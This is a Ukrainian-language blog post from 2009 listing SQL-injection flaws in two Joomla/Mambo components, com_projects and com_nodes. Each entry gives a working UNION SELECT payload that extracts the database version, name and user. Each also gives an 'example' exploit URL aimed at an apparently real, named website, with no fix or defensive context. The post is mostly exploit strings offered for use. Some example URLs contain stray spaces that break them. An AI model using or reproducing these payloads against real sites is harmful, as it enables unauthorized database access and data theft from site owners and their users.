Home > Безпека > Вразливості компонентів Joomla/Mambo (01)

Вразливості компонентів Joomla/Mambo (01)

October 12th, 2009 Dimi4 Leave a comment Go to comments

Компонент: Projects

Тип вразливості: SQL-injection

Знайдено: 27.09.2009

Знайшов: Dimi4
index?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--


Приклад: http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Vers ion(),Database(),User()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Компонент: com_nodes

Тип вразливості: SQL-injection

Знайдено: 27.09.2009

Знайшов: Dimi4

index?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
Приклад: http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal

  1. No comments yet.
  1. No trackbacks yet.